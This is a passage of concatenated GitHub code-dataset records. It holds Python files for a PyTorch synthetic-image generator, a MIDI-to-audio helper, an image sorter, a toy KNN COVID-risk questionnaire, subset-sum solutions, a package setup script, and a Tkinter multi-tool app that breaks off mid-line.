torch.stack([cyys.reshape(-1), cxxs.reshape(-1)]).to(self.device)\n for bidx in range(batch_size):\n # Sample size of objects\n object_radius = object_radiuses[bidx]\n lab = (torch.rand(1) > .5).float()\n if lab == 1 and not self.one_object_size_per_batch:\n object_radius[1] = object_radius[0] # Copy the sizes\n\n # (1) Create a grid of locations, where objects will be placed\n # Random uniform per location, then select the self.max_objects top locations\n # Scale the positions of the grid (plus random jitter)\n # Choose the selected object locations in the masking step below\n positions = torch.rand(loc_grid.shape[1], requires_grad=False, device=self.device)\n position_thresh = torch.argsort(positions)[:self.max_objects]\n\n # Gradient for spatial scale comes from here:\n # coords = loc_grid[position_thresh]\n loc_scale = gau.rsample([2]) # .abs()\n loc_scale = (loc_scale.ceil() - loc_scale).detach() + loc_scale\n coords = loc_grid * loc_scale.reshape(-1, 1)\n max_coords = coords.max(1)[0]\n y_offset = ((self.img_size - max_coords[0]) / 2).floor()\n x_offset = ((self.img_size - max_coords[1]) / 2).floor()\n coords = coords[:, position_thresh] + torch.stack((y_offset, x_offset)).reshape(-1, 1)\n coords = torch.clamp(coords, 0, adj_ceil)\n\n # Draw objects\n by = coords[0].reshape(self.max_objects, 1, 1)\n bx = coords[1].reshape(self.max_objects, 1, 1)\n obj_d = torch.pow(yys - by, 2) + torch.pow(xxs - bx, 2)\n if self.one_object_size_per_batch:\n obj_mask = torch.clamp(\n ((object_radius.reshape(\n 1, 1, 1) + 1) - obj_d), 0, 1)\n else:\n obj_mask = torch.clamp(\n ((object_radius.reshape(\n self.max_objects, 1, 1) + 1) - obj_d), 0, 1)\n obj = obj_mask * dynamic_range[bidx]\n if lab == 1:\n q_idx = torch.nonzero(obj[0]) # Query\n t_idx = torch.nonzero(obj[1]) # Target\n same_tex = dynamic_range[bidx, 0, q_idx[:, 0], q_idx[:, 1]]\n obj[1, t_idx[:, 0], t_idx[:, 1]] = same_tex\n\n # Mask to only show num_objects locations\n if self.dists[0]['family'] == 'categorical':\n obj = obj * num_objects[bidx]\n else:\n obj = obj * num_objects[bidx].reshape(\n self.max_objects, 1, 1)\n\n # Aggregate the batch\n if self.siamese:\n image_batch[bidx, ..., 0] = obj[0]\n image_batch[bidx, ..., 1] = obj[1:].sum(0)\n else:\n image_batch[bidx] = obj.sum(0)\n\n # Change task to SR if requested\n if self.task == 'sr':\n masked_coords = coords.detach() * num_objects[bidx].detach().squeeze(-1) # noqa\n masked_coords = masked_coords[torch.nonzero(masked_coords.sum(-1))] # noqa\n masked_coords = masked_coords.reshape(-1, 2)\n es, vs = torch.eig(utils.cov(masked_coords), eigenvectors=True)\n # theta = torch.atan2(v[1, 0], v[0, 0]) * (180. / math.pi)\n sorted_es = torch.argsort(\n es[:, 0], dim=0, descending=True) # Only real part\n vs = vs[:, sorted_es] # Column vectors\n theta = torch.atan2(\n torch.abs(vs[1, 0]), vs[0, 0]) * (180. / math.pi)\n lab = 0\n if theta >= 45 and theta < 135 or theta >= 225 and theta < 315:\n lab = 1 # what is the elegant way of doing this ^^\n label_batch[bidx] = lab\n\n # Hardcode the normalization\n image_batch = torch.repeat_interleave(\n image_batch.unsqueeze(1), 3, dim=1)\n image_batch = (image_batch + 1.) / 2.\n image_batch = image_batch - self.norm_mean\n image_batch = image_batch / self.norm_std\n\n # image_batch = utils.normalize_fun(\n # image_batch,\n # reshape=self.reshape,\n # mean=self.norm_mean,\n # std=self.norm_std)\n # # Convert labels to one-hot\n # y = torch.eye(self.num_classes).to(self.device)\n # label_batch = y[label_batch].squeeze(1).long()\n del yys # v1\n del xxs # v1\n del y_range, x_range\n return image_batch, label_batch.squeeze()\n\n","repo_name":"drewlinsley/genadv","sub_path":"data_generators/psvrt.py","file_name":"psvrt.py","file_ext":"py","file_size_in_byte":35415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13612376571","text":"# the following is to play music on google colab\nfrom music21 import *\nfrom midi2audio import FluidSynth\n\ndef score_to_wav(score, filename):\n mf = midi.translate.streamToMidiFile(score)\n mf.open('music.mid', 'wb')\n mf.write()\n mf.close()\n # Convert midi to audio\n FluidSynth().midi_to_audio('music.mid', filename)\n\n # Play the audio file\n return filename","repo_name":"BZoennchen/musical-interrogation","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73630581447","text":"import cv2\nimport os\nimport shutil\nfrom numpy import mean\nfrom tqdm import tqdm\n\n\ndef info(image_path):\n \"\"\"\"\"\"\n image_test = cv2.imread(image_path)\n b_mean = mean(image_test[:, :, 0])\n g_mean = mean(image_test[:, :, 1])\n r_mean = mean(image_test[:, :, 2])\n return int(b_mean), int(g_mean), int(r_mean)\n\n\ndef check(image_path, threshold=300):\n return True if sum(info(image_path)) > threshold else False\n\n\ndef copy(source_root, origin_target_root, violet_target_root):\n \"\"\"\"\"\"\n image_name_list = os.listdir(source_root)\n\n for image_name in tqdm(image_name_list):\n\n # get image path\n source_image_path = os.path.join(source_root, image_name)\n if check(source_image_path):\n target_image_path = os.path.join(violet_target_root, image_name)\n shutil.copy(source_image_path, target_image_path)\n else:\n target_image_path = os.path.join(origin_target_root, image_name)\n shutil.copy(source_image_path, target_image_path)\n\n\nif __name__ == '__main__':\n\n def mkdir(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\n origin_query_path = \"/tmp/data/origin/query\"\n origin_gallery_path = \"/tmp/data/origin/bounding_box_test\"\n\n violet_query_path = \"/tmp/data/violet/query\"\n violet_gallery_path = '/tmp/data/violet/bounding_box_test'\n\n query_B = \"/tmp/data/test/query_B\"\n gallery_B = \"/tmp/data/test/gallery_B\"\n\n mkdir(origin_query_path)\n mkdir(origin_gallery_path)\n mkdir(violet_query_path)\n mkdir(violet_gallery_path)\n\n # query\n copy(\n source_root=query_B,\n origin_target_root=origin_query_path,\n violet_target_root=violet_query_path,\n )\n copy(\n source_root=gallery_B,\n origin_target_root=origin_gallery_path,\n violet_target_root=violet_gallery_path,\n )\n","repo_name":"yuzhijun2/NAIC_reid_challenge_rank14_rank25","sub_path":"get_violet_test.py","file_name":"get_violet_test.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12723078799","text":"# k neares neghbour\r\n# coded by PR@$OON KU$#W@#@\r\n\r\ndef calculate_distance(x1, x2, x3, x4, x5, dataset):\r\n distances = []\r\n for data in dataset:\r\n dist = ((x1 - data[0]) ** 2 + (x2 - data[1]) ** 2 + (x3 - data[2]) ** 2 +\r\n (x4 - data[3]) ** 2 + (x5 - data[4]) ** 2) ** 0.5\r\n distances.append(dist)\r\n return distances\r\n\r\n\r\ndef get_input(prompt, valid_range=None):\r\n while True:\r\n try:\r\n user_input = int(input(prompt))\r\n if valid_range is not None and user_input not in valid_range:\r\n raise ValueError\r\n return user_input\r\n except ValueError:\r\n print(\"Invalid input. Please enter a valid value.\")\r\n\r\n\r\ndef main():\r\n dataset = [[37.0, 1, 4, 3, 0, 'highrisk'], [36.5, 0, 2, 2, 0, 'highrisk'], [36.5, 0, 0, 1, 1, 'lowrisk'],\r\n [37.2, 1, 2, 2, 0, 'moderate'], [36.8, 1, 5, 3, 1, 'highrisk'], [37.5, 0, 0, 0, 0, 'lowrisk'],\r\n [36.91, 1, 1, 0, 1, 'moderate'], [37.3, 0, 5, 3, 1, 'highrisk'], [36.3, 0, 2, 1, 1, 'lowrisk'],\r\n [37.1, 1, 4, 3, 1, 'highrisk'], [36.5, 0, 3, 2, 1, 'highrisk'], [37.3, 1, 1, 2, 1, 'moderate'],\r\n [37.0, 0, 0, 1, 1, 'lowrisk'], [36.4, 1, 0, 1, 0, 'lowrisk'], [37.6, 1, 3, 3, 0, 'highrisk'],\r\n [37.2, 0, 1, 0, 0, 'moderate'], [37.2, 0, 1, 0, 0, 'moderate'], [36.5, 0, 0, 1, 1, 'lowrisk'],\r\n [36.9, 1, 0, 0, 0, 'lowrisk'], [36.7, 0, 5, 1, 0, 'moderate'], [35.9, 1, 0, 0, 0, 'lowrisk'],\r\n [37.0, 1, 2, 0, 1, 'moderate'], [36.5, 0, 0, 1, 0, 'lowrisk'], [36.7, 1, 5, 6, 0, 'highrisk'],\r\n [37.1, 0, 2, 1, 1, 'moderate'], [36.39, 1, 1, 1, 0, 'moderate'], [37.2, 0, 0, 0, 1, 'lowrisk'],\r\n [37.3, 0, 2, 1, 0, 'moderate'], [37.5, 0, 1, 2, 0, 'moderate'], [36.8, 1, 0, 2, 0, 'lowrisk'],\r\n [36.7, 0, 4, 3, 0, 'highrisk'], [36.4, 0, 0, 1, 1, 'moderate'], [37.0, 0, 2, 3, 0, 'moderate']]\r\n \r\n\r\n while True:\r\n bodytemp = float(input('Enter the temperature of your body 🌡 '))\r\n if not (35 <= bodytemp <= 42.5):\r\n print('Invalid temperature. Please enter a valid body temperature (35°C to 42.5°C).')\r\n continue\r\n\r\n intervisit = get_input('Do you have any international visits? ✈️ (1 for YES, 0 for NO): ', [0, 1])\r\n\r\n Ssym = get_input('How many symptoms do you have out of the following? 🤧 \\n'\r\n '1. Difficulty in breathing\\n2. Chest pain\\n3. Loss of speech or movement\\n'\r\n '4. Fever\\n5. Dry cough\\n', range(0, 6))\r\n\r\n Csym = get_input('How many symptoms do you have out of the following? 🤒 \\n'\r\n '1. Sore throat\\n2. Loss of taste/smell\\n3. Headache\\n4. Discoloration of finger or toes\\n'\r\n '5. Rashes\\n6. Diarrhea\\n', range(0, 6))\r\n\r\n IntCovid = get_input('Have you had any interaction with a COVID+ patient? 🏥 (1 for YES, 0 for NO): ', [0, 1])\r\n\r\n distances = calculate_distance(bodytemp, intervisit, Ssym, Csym, IntCovid, dataset)\r\n sorted_distances, sorted_risk = zip(*sorted(zip(distances, [data[5] for data in dataset])))\r\n\r\n n1 = sorted_risk[:7].count('lowrisk')\r\n n2 = sorted_risk[:7].count('moderate')\r\n n3 = sorted_risk[:7].count('highrisk')\r\n\r\n print('\\n======================== RESULT ===============================\\n')\r\n if n1 > n2 and n1 > n3:\r\n print('Low risk, stay at home 🏠')\r\n elif n2 > n1 and n2 > n3:\r\n print('Moderate risk is there, you must have a checkup')\r\n elif n3 > n1 and n3 > n2:\r\n print('High risk, urgent checkup required')\r\n\r\n print('\\n=========================== ================================\\n')\r\n x = input('\\nDo you want to continue the program? (Type \"NO\" to exit, press Enter to continue): ')\r\n if x.strip().lower() == 'no':\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"Prasoon-kushwaha/COVID-19-Prediction-ML-KNN","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14286759567","text":"def set_sum_naive(nums, target): # O(2^n * n) time, O(n) space\n def helper(left, s, i):\n if not left:\n return s\n if i == len(nums) or left < 0:\n return \n attempt = helper(left - nums[i], s + [i], i + 1) # inline append O(n)\n return attempt or helper(left, s, i + 1) \n\n s = helper(target, [], 0)\n if s is not None:\n return [nums[i] for i in s]\n\nprint(set_sum_naive([12, 1, 61, 5, 9, 2], 24))\n\ndef set_sum_naive2(nums, target): # O(2^n) time, O(n) space\n s = [0] * len(nums)\n def helper(left, i):\n if not left:\n return 1\n if i == len(nums) or left < 0:\n return \n \n s[i] = 1\n attempt = helper(left - nums[i], i + 1)\n if attempt is not None:\n return attempt\n \n s[i] = 0\n return helper(left, i + 1)\n\n helper(target, 0)\n if s is not None:\n return [nums[i] for i in range(len(s)) if s[i] != 0]\n\nprint(set_sum_naive2([12, 1, 61, 5, 9, 2], 24))\n\ndef set_sum_naive3(nums, target): # O(2^n) time, O(1) space\n s = 0 \n def helper(left, i):\n if not left:\n return 1\n if i == len(nums) or left < 0:\n return \n \n nonlocal s \n s = s | 1 << i \n attempt = helper(left - nums[i], i + 1)\n if attempt is not None:\n return attempt\n \n s = s & ~(1 << i)\n return helper(left, i + 1)\n\n helper(target, 0)\n if s:\n return [nums[i] for i in range(len(nums)) if (s & 1 << i) != 0]\n \nprint(set_sum_naive3([12, 1, 61, 5, 9, 2], 24))\n\ndef set_sum(nums, target): # O(n*k) time, O(n*k) space, not sure fully correct since we lose knowledge of some old options as we iterate\n mem = [[0] * (len(nums) + 1) for _ in range(target + 1)]\n for i, num in enumerate(nums, 1):\n for j in range(target + 1):\n if j >= num and mem[j - num][i - 1]: # losing option if mem[j][i - 1] was valid without num\n mem[j][i] = mem[j - num][i - 1] | (1 << (i - 1))\n elif mem[j][i - 1]:\n mem[j][i] = mem[j][i - 1]\n elif j == num:\n mem[j][i] = 1 << (i - 1) \n if mem[-1][-1]:\n return [nums[i] for i in range(len(nums)) if (mem[-1][-1] & 1 << i) != 0]\n\nprint(set_sum([12, 1, 61, 5, 9, 2], 24))\n \n \n \n","repo_name":"nikhilro/daily-coding-problem","sub_path":"p42.py","file_name":"p42.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32139886159","text":"from setuptools import setup\n\nrequirements = []\nf = open('requirements.txt', 'r')\nwhile True:\n l = f.readline()\n if l == '':\n break\n requirements.append(l.rstrip())\nf.close()\n\nsql_requirements = []\nf = open('sql_requirements.txt', 'r')\nwhile True:\n l = f.readline()\n if l == '':\n break\n sql_requirements.append(l.rstrip())\nf.close()\n\ntest_requirements = []\nf = open('test_requirements.txt', 'r')\nwhile True:\n l = f.readline()\n if l == '':\n break\n test_requirements.append(l.rstrip())\nf.close()\n\nf = open('README.md', 'r')\ndescription = f.read()\nf.close()\n\nsetup(\n name=\"funga-eth\",\n version=\"0.7.4\",\n description=\"Ethereum implementation of the funga keystore and signer\",\n author=\"Louis Holbrook\",\n author_email=\"dev@holbrook.no\",\n packages=[\n 'funga.eth.signer',\n 'funga.eth',\n 'funga.eth.cli',\n 'funga.eth.keystore',\n 'funga.eth.runnable',\n ],\n install_requires=requirements,\n extras_require={\n 'sql': sql_requirements,\n },\n tests_require=test_requirements,\n entry_points = {\n 'console_scripts': [\n 'funga-ethd=funga.eth.runnable.signer:main',\n 'eth-keyfile=funga.eth.runnable.keyfile:main',\n 'eth-sign-msg=funga.eth.runnable.msg:main',\n ],\n },\n url='https://git.defalsify.org/funga-eth',\n include_package_data=True,\n long_description=description,\n long_description_content_type='text/markdown',\n )\n","repo_name":"chaintool-py/funga-eth","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7497778012","text":"from os import path\n\nfrom jargon_py.query import one\n\nfrom pyle.framework import get_param, \\\n load_markup, \\\n load_file_module, \\\n TargetInfo\nfrom pyle.framework.loader import Loader\n\n\nclass Application:\n @property\n def name(self):\n return self.__app_cnf['name']\n\n @property\n def target(self):\n return self.__app_cnf['target']\n\n @property\n def views(self):\n return self.__app_cnf['views']\n\n def __init__(self, app_info):\n \"\"\"\n Application loads the file containing json markup to initialize the application.\n\n :param app_info: application target information including the app module and name\n of the app's json markup file.\n\n :return:\n \"\"\"\n markup = load_markup(app_info.target)\n self.__app_cnf = {\n 'name': get_param(str, one(markup['application']), 'n', func=lambda s: s.replace(\"'\", \"\")),\n 'views': load_file_module(app_info.target)\n }\n self.__set_target_path(markup)\n\n self.mainloop = self.__run\n\n def __set_target_path(self, markup):\n views = self.__app_cnf['views']\n target_path = get_param(str, one(markup['application']), 't',\n func=lambda s: '{dir}\\\\{file}.jss'.format(dir=path.dirname(views.__file__),\n file=s.split('.')[-1]))\n\n self.__app_cnf.update({'target': target_path})\n\n def __run(self):\n view_info = TargetInfo(self.__app_cnf['views'], self.__app_cnf['target'])\n loader = Loader(view_info)\n loader.run()\n","repo_name":"razorware/pyxelbox","sub_path":"pyle/bootstrap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9110061789","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nimport speech_recognition as sr\r\nimport pyttsx3\r\nimport yagmail\r\nimport pygame\r\nimport os\r\nfrom tkinter import filedialog\r\nimport tkinter.messagebox\r\nimport webbrowser\r\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\r\nimport random\r\n\r\nrootp=Tk()\r\nrootp.title(\"Welcome Page\")\r\nrootp.geometry(\"600x470\")\r\nrootp.resizable(False,False)\r\n\r\ndef music_player():\r\n rootp.withdraw()\r\n nw1=Tk()\r\n nw1.title(\"Welcome to Music Player\")\r\n nw1.geometry(\"697x250+300+220\")\r\n## nw1.resizable(False,False)\r\n\r\n pygame.init()\r\n # Initiating Pygame Mixer\r\n pygame.mixer.init()\r\n # Declaring track Variable\r\n # Declaring track Variable\r\n track = StringVar()\r\n # Declaring Status Variable\r\n status = StringVar()\r\n \r\n def play():\r\n # Displaying Selected Song title\r\n track.set(playlist.get(ACTIVE))\r\n # Displaying Status\r\n status.set(\"-Playing\")\r\n # Loading Selected Song\r\n pygame.mixer.music.load(playlist.get(ACTIVE))\r\n # Playing Selected Song\r\n pygame.mixer.music.set_volume(0.1)\r\n #print(pygame.mixer.music.get_volume())\r\n pygame.mixer.music.play(-1)\r\n pausebtn['text'] = \"PAUSE\"\r\n\r\n def pause():\r\n # unpause and pause\r\n unpause = True\r\n if(unpause):\r\n # Displaying Status\r\n status.set(\"-Paused\")\r\n pausebtn['text'] = \"PAUSED\"\r\n # Paused Song\r\n pygame.mixer.music.pause()\r\n unpause = False\r\n \r\n def stop():\r\n # Displaying Status\r\n status.set(\"-Stopped\")\r\n # Stopped Song\r\n pygame.mixer.music.stop()\r\n\r\n def openl():\r\n path = filedialog.askdirectory()\r\n # Changing Directory for fetching Songs\r\n \r\n try:\r\n os.chdir(path)\r\n except:\r\n tkinter.messagebox.showerror(\"Error\",\"You didn't select any folder\")\r\n \r\n # Fetching Songs\r\n songtracks = os.listdir()\r\n # Inserting Songs into Playlist\r\n playlist.delete(0,END)\r\n for track in songtracks:\r\n if track.endswith('.mp3'):\r\n playlist.insert(END, track)\r\n\r\n def homebtn():\r\n nw1.withdraw()\r\n rootp.deiconify()\r\n \r\n # title frame\r\n track_frame = LabelFrame(nw1,text=\"Song Track\",font=(\"times new roman\",15,\"bold\"),bg=\"blue\",fg=\"white\",bd=5,relief=GROOVE)\r\n track_frame.place(x=0,y=0,width=400,height=100)\r\n \r\n # Inserting Song Track Label\r\n songtrack = Label(track_frame, textvariable=track ,width=23, font=(\"times new roman\",15,\"bold\"),bg=\"blue\", fg=\"gold\")\r\n songtrack.place(x=0,y=10)\r\n\r\n # Inserting Status Label\r\n trackstatus = Label(track_frame, textvariable=status ,width=10, font=(\"times new roman\", 15, \"bold\"), bg=\"blue\",fg=\"gold\")\r\n trackstatus.place(x=280,y=10)\r\n\r\n # Creating Button Frame\r\n buttonframe = LabelFrame(nw1, text=\"Control Panel\", font=(\"times new roman\", 15, \"bold\"), bg=\"blue\",fg=\"white\", bd=5, relief=GROOVE)\r\n buttonframe.place(x=0, y=100, width=400, height=150)\r\n # Inserting Play Button\r\n playbtn = Button(buttonframe, text=\"PLAY\", command=play, width=8, height=1,font=(\"times new roman\", 12, \"bold\"), fg=\"navyblue\", bg=\"gold\")\r\n playbtn.place(x=20,y=15)\r\n # Inserting Pause Button\r\n pausebtn = Button(buttonframe, text=\"PAUSE\", command=pause, width=8, height=1,font=(\"times new roman\", 12, \"bold\"), fg=\"navyblue\", bg=\"gold\")\r\n pausebtn.place(x=150,y=15)\r\n # Inserting Stop Button\r\n stopbtn = Button(buttonframe, text=\"STOP\", command=stop, width=8, height=1,font=(\"times new roman\", 12, \"bold\"), fg=\"navyblue\", bg=\"gold\")\r\n stopbtn.place(x=280,y=15)\r\n # Inserting Open Button\r\n openbtn = Button(buttonframe, text=\"Open\", command=openl, width=8, height=1,font=(\"times new roman\", 14, \"bold\"), fg=\"black\", bg=\"white\")\r\n openbtn.place(x=80,y=70)\r\n\r\n exitbtn=Button(buttonframe,text=\"Home\",command=homebtn ,width=8,height=1,font=(\"times new roman\", 14, \"bold\"), fg=\"black\", bg=\"white\")\r\n exitbtn.place(x=200,y=70)\r\n # Creating Playlist Frame\r\n songsframe = LabelFrame(nw1, text=\"Song Playlist\", font=(\"times new roman\", 15, \"bold\"), bg=\"blue\",fg=\"white\", bd=5, relief=GROOVE)\r\n songsframe.place(x=400, y=0, width=300, height=250)\r\n # Inserting scrollbar\r\n scrol_y = Scrollbar(songsframe, orient=VERTICAL)\r\n # Inserting Playlist listbox\r\n playlist = Listbox(songsframe, yscrollcommand=scrol_y.set, selectbackground=\"gold\", selectmode=SINGLE,font=(\"times new roman\", 12, \"bold\"), bg=\"silver\", fg=\"navyblue\", bd=5, relief=GROOVE)\r\n # Applying Scrollbar to listbox\r\n scrol_y.pack(side=RIGHT, fill=Y)\r\n scrol_y.config(command=playlist.yview)\r\n playlist.pack(fill=BOTH)\r\n \r\n ##########################\r\n nw1.mainloop()\r\n \r\ndef browser():\r\n rootp.withdraw()\r\n nw2=Toplevel()\r\n nw2.title(\"Web-Browser\")\r\n nw2.geometry(\"400x400\")\r\n nw2.resizable(False,False)\r\n\r\n photo = PhotoImage(file='mic IMG.png').subsample(2,2)\r\n\r\n btn = StringVar()\r\n\r\n def buttonClick():\r\n pygame.init()\r\n pygame.mixer.music.load('chime1.mp3')\r\n pygame.mixer.music.play()\r\n\r\n r = sr.Recognizer ()\r\n r.pause_threshold = 0.7\r\n r.energy_threshold = 400\r\n \r\n engine = pyttsx3.init()\r\n voices = engine.getProperty('voices')\r\n engine.setProperty('voice', voices[0].id)\r\n def talk(text):\r\n engine.say(text)\r\n engine.runAndWait()\r\n \r\n\r\n with sr.Microphone() as source:\r\n try:\r\n r.adjust_for_ambient_noise(source)\r\n audio = r.listen(source, timeout=10)\r\n message = str(r.recognize_google(audio))\r\n pygame.mixer.music.load('chime2.mp3')\r\n pygame.mixer.music.play()\r\n\r\n if btn.get() == 'google':\r\n webbrowser.open('http://google.com/search?q='+message)\r\n\r\n elif btn.get() == 'ytb':\r\n webbrowser.open('https://www.youtube.com/results?search_query='+message)\r\n\r\n else:\r\n pass\r\n\r\n except sr.UnknownValueError:\r\n talk('Google Speech Recognition could not understand audio')\r\n\r\n except sr.RequestError as e:\r\n talk('Could not request results from Google Speech Recognition Service')\r\n\r\n else:\r\n pass\r\n nw2.withdraw()\r\n rootp.deiconify()\r\n\r\n def homebtn2():\r\n nw2.withdraw()\r\n rootp.deiconify()\r\n\r\n Label(nw2,text='WELCOME TO NP ASSISSTANT',relief='ridge',font='times 20 bold italic',fg='black',bg='CadetBlue1').pack()\r\n r1= Radiobutton(nw2, text='Google',font=\"arial 10 bold\", value='google', variable=btn,bg='CadetBlue1')\r\n r1.place(x=70,y=300)\r\n r2= Radiobutton(nw2, text='Youtube', font=\"arial 10 bold\",value='ytb', variable=btn,bg='CadetBlue1')\r\n r2.place(x=250,y=300)\r\n b6 = Button(nw2, image=photo, command=buttonClick, bg='CadetBlue1', activebackground='black', overrelief='groove', relief='sunken')\r\n b6.place(x=150,y=100)\r\n Label(nw2,text=\"Click Me!!!\", font=\"arial 14 bold\",fg=\"black\",bg='CadetBlue1').place(x=160,y=230)\r\n b7 = Button(nw2,text=\"Home\", font=\"arial 12\",command=homebtn2)\r\n b7.place(x=180,y=340)\r\n btn.set('google')\r\n nw2.config(bg='CadetBlue1')\r\n nw2.mainloop()\r\n \r\ndef analyser():\r\n rootp.withdraw()\r\n nw3=Tk()\r\n nw3.title(\"Sentiment Analyser\")\r\n nw3.resizable(False,False)\r\n\r\n def detectSentiment(): # get a whole input content from text box\r\n sentence=entry.get()\r\n t1.delete(0.0,END)\r\n # Create a Sentiment IntensityAnalyzer object.\r\n sid_obj=SentimentIntensityAnalyzer()\r\n #polarity_scores method of SentimentintensityAnalyzer\r\n #object gives a sentiment dictionary. #which contains pos, neg, neu, and compound scores.\r\n sentiment_dict = sid_obj.polarity_scores(sentence)\r\n \r\n negative_string=str(sentiment_dict['neg']*100) + \"% Negative\"\r\n t1.insert(END, negative_string+'\\n')\r\n \r\n neutral_string=str(sentiment_dict['neu']*100) + \"% Neutral\"\r\n t1.insert(END, neutral_string+'\\n')\r\n \r\n positive_string=str(sentiment_dict['pos']*100) + \"% Positive\"\r\n t1.insert(END, positive_string+'\\n')\r\n # decide sentiment as positive, negative and neutral\r\n if sentiment_dict['compound'] >= 0.05 :\r\n string=\"Positive\"\r\n elif sentiment_dict['compound']<= -0.05 :\r\n string=\"Negative\"\r\n else:\r\n string=\"Neutral\"\r\n t1.insert(END,f\"Overall Result: {string}\")\r\n\r\n def home22():\r\n nw3.withdraw()\r\n rootp.deiconify()\r\n\r\n nw3.configure(bg='#00003c')\r\n nw3.geometry(\"300x325\")\r\n entry=Entry(nw3, width=20, font=('arial',14))\r\n entry.place(x=5,y=20)\r\n \r\n btn2= Button(nw3, text='Analyze', bg=\"#201d2e\", width= 6,fg='white', font=(\"Arial\", 10 ), command=detectSentiment)\r\n btn2.place(x=232,y=20)\r\n frame2 = Frame(nw3, bd=2, relief=RIDGE, bg='#201d2e')\r\n frame2.place(x=10, y=70,height=250,width=280)\r\n Label(frame2, text=\"Result\",bg=\"#201d2e\",fg='white',font=('arial', 12, 'bold')).place(x=10,y=5)\r\n t1= Text(frame2, bd=2, relief= SUNKEN, font=(\"Calibri\",12, 'bold'))\r\n t1.place(x=10,y=30,width=255,height=150)\r\n\r\n title_label= Label(frame2, text='Sentimental Analyser',font= ('artal', 12, 'bold'),fg='#ffffff',bg='#201d2e')\r\n title_label.place(x=60,y=185)\r\n\r\n b22=Button(frame2, text='HOME',font= ('artal', 10, 'bold'),fg='#ffffff',bg='#201d2e',command=home22)\r\n b22.place(x=110,y=210)\r\n \r\n nw3.mainloop()\r\n \r\ndef game():\r\n rootp.withdraw()\r\n nw4=Tk()\r\n nw4.title(\"Game\")\r\n nw4.geometry(\"550x300\")\r\n nw4.resizable(False,False)\r\n computer_value={\"0\":\"Rock\",\"1\":\"Paper\",\"2\":\"Scissor\"}\r\n def reset_game():\r\n b7[\"state\"]=\"active\"\r\n b8[\"state\"]=\"active\"\r\n b9[\"state\"]=\"active\"\r\n l1.config(text=\"Player \")\r\n l3.config(text=\"Computer\")\r\n l4.config(text=\"\")\r\n\r\n def button_disable():\r\n b7[\"state\"]=\"disable\"\r\n b8[\"state\"]=\"disable\"\r\n b9[\"state\"]=\"disable\"\r\n\r\n def isrock():\r\n c_v=computer_value[str(random.randint(0,2))]\r\n if c_v==\"Rock\":\r\n match_result=\"Match Draw\"\r\n elif c_v==\"Scissor\":\r\n match_result=\"Player Win\"\r\n else:\r\n match_result=\"Computer Win\"\r\n l4.config(text=match_result)\r\n l1.config(text=\"Rock \")\r\n l3.config(text=c_v)\r\n button_disable()\r\n\r\n def ispaper():\r\n c_v=computer_value[str(random.randint(0,2))]\r\n if c_v==\"Paper\":\r\n match_result=\"Match Draw\"\r\n elif c_v==\"Scissor\":\r\n match_result=\"Computer Win\"\r\n else:\r\n match_result=\"Player Win\"\r\n l4.config(text=match_result)\r\n l1.config(text=\"Paper \")\r\n l3.config(text=c_v)\r\n button_disable()\r\n\r\n def isscissor():\r\n c_v=computer_value[str(random.randint(0,2))]\r\n if c_v==\"Rock\":\r\n match_result=\"Computer Win\"\r\n elif c_v==\"Scissor\":\r\n match_result=\"Match Draw\"\r\n else:\r\n match_result=\"Player Win\"\r\n l4.config(text=match_result)\r\n l1.config(text=\"Scissor \")\r\n l3.config(text=c_v)\r\n button_disable()\r\n\r\n def homebt():\r\n nw4.withdraw()\r\n rootp.deiconify()\r\n\r\n Label(nw4,text=\"Rock Paper Scissor\",font=\"normal 20 bold\",fg=\"blue\").pack(pady=20)\r\n frame=Frame(nw4)\r\n frame.pack()\r\n\r\n l1=Label(frame,text=\"Player \",font=10,bg='DeepSkyBlue')\r\n l2=Label(frame,text=\"VS \",font=\"normal 10 bold\",bg='DeepSkyBlue')\r\n l3=Label(frame,text=\"Computer \",font=10,bg='DeepSkyBlue')\r\n l1.pack(side=LEFT)\r\n l2.pack(side=LEFT)\r\n l3.pack()\r\n\r\n l4=Label(nw4,text=\"\",font=\"normal 20 bold\",bg=\"white\",width=15,borderwidth=2,relief=\"solid\")\r\n l4.pack(pady=20)\r\n frame1=Frame(nw4)\r\n frame1.pack()\r\n\r\n b7=Button(nw4,text=\"Rock\",font=10,width=7,command=isrock)\r\n b8=Button(nw4,text=\"Paper\",font=10,width=7,command=ispaper)\r\n b9=Button(nw4,text=\"Scissor\",font=10,width=7,command=isscissor)\r\n b7.place(x=120,y=190)\r\n b8.place(x=225,y=190)\r\n b9.place(x=330,y=190)\r\n\r\n Button(nw4,text=\"Reset Game\",font=10,fg=\"white\",bg=\"black\",command=reset_game).place(x=145,y=240)\r\n Button(nw4,text=\"Home\",font=8,fg=\"white\",bg=\"black\",command=homebt).place(x=315,y=240)\r\n nw4.config(bg='DeepSkyBlue')\r\n nw4.mainloop()\r\n \r\ndef exit():\r\n rootp.withdraw()\r\n\r\nb1=Button(rootp,text=\"Music Player\",fg=\"blue\",font='times 13 bold',command=music_player)\r\nb1.place(x=50,y=110)\r\nb1.config(height=5,width=23)\r\nb2=Button(rootp,text=\"Search on Web Browser\",fg=\"blue\",font='times 13 bold',command=browser)\r\nb2.place(x=310,y=110)\r\nb2.config(height=5,width=23)\r\nb3=Button(rootp,text=\"Get your Text 